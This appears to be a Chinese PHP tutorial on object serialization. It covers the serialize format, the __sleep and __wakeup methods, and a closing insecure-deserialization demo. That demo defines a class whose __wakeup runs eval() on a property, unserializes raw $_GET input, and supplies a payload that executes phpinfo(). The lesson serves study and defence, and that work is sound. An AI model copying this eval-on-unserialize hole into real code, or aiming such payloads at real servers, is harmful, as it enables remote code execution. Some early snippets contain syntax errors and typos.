赞
踩
- <?php
- class student{
- var $a=c;
- echo $a;
- }
- ?>
- <?php
- class student{
- var $a=c;
- echo $a;
- }
- $z=new student();
- ?>
- <?php
- //创建类
- class student{
- public $name="zhangsan";
- public $age=8;
- public $sex="male";
- public $bul=flase;
- }
- //创建对象
- $Student=new student();
- //序列化对象
- $str=serialize($Student);
- //打印
- echo $str;
- ?>
- 输出结果:
- O:7:"student":3:{s:4:"name";s:8:"zhangsan";s:3:"age";i:8;s:3:"sex";s:4:"male";}
- <?php
- //创建类
- class student{
- public $name="zhangsan";
- public $age=8;
- public $sex="male";
- public $bur=false;
- public $gir=1.111;
- public $arr=array('a','b','c');
- private $name2="zhangsan";
- protected $name3="zhangsan";
- }
- //创建对象
- $Student=new student();
- var_dump($Student);
- echo "<br>";
- //序列化对象
- $str=serialize($Student);
- //打印
- var_dump($str);
- echo "<br>";
- //将序列化的字符串,反序列化
- $unstr=unserialize($str);
- //打印
- var_dump($unstr);
- ?>
-
- object(student)#1 (8) { ["name"]=> string(8) "zhangsan" ["age"]=> int(8)
- ["sex"]=> string(4) "male" ["bur"]=> bool(false) ["gir"]=> float(1.111) ["arr"]=>
- array(3) { [0]=> string(1) "a" [1]=> string(1) "b" [2]=> string(1) "c" }
- ["name2":"student":private]=> string(8) "zhangsan" ["name3":protected]=>
- string(8) "zhangsan" }
- string(230) "O:7:"student":8:
- {s:4:"name";s:8:"zhangsan";s:3:"age";i:8;s:3:"sex";s:4:"male";s:3:"bur";b:0;s:3:
- "gir";d:1.111;s:3:"arr";a:3:
- {i:0;s:1:"a";i:1;s:1:"b";i:2;s:1:"c";}s:14:"studentname2";s:8:"zhangsan";s:8:"*n
- ame3";s:8:"zhangsan";}"
- object(student)#2 (8) { ["name"]=> string(8) "zhangsan" ["age"]=> int(8)
- ["sex"]=> string(4) "male" ["bur"]=> bool(false) ["gir"]=> float(1.111) ["arr"]=>
- array(3) { [0]=> string(1) "a" [1]=> string(1) "b" [2]=> string(1) "c" }
- ["name2":"student":private]=> string(8) "zhangsan" ["name3":protected]=>
- string(8) "zhangsan" }
- bool-------->b:value 例:s:3:"bul";b:0;=========>$bul=false
- string------->s:count:value 例: s:4:"qwer";s:4:"qwer"; =========>$qwer=qwer
- int---------->i:value 例:s:2:"in";i:8; ========>$in=8
- Object------->O:<obj-name-length>:<obj-name>:属性数量; 例:O:3:"res":2:
- array-------->a:3:{i:0;i:1;i:1;i:2;i:2;i:34}============>array(1,2,34)
- <?php
- class people{
- public function __sleep(){
- echo "sleep";
- }
- public function __wakeup(){
- echo "wakeup";
- }
- }
- $People=new people();
- $str=serialize($People);
- $unstr=unserialize($str);
- ?>
- <?php
- class pussy{
- public $name='lihua';
- public function __wakeup(){
- eval($this->name);
- }
- }
- $a=$_GET['a'];
- unserialize($a);
- ?>
- 用户可操作参数传入序列化字符串,且被反序列化函数处理
- payload:
- O:5:"pussy":1:{s:4:"name";s:10:"phpinfo();";}
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。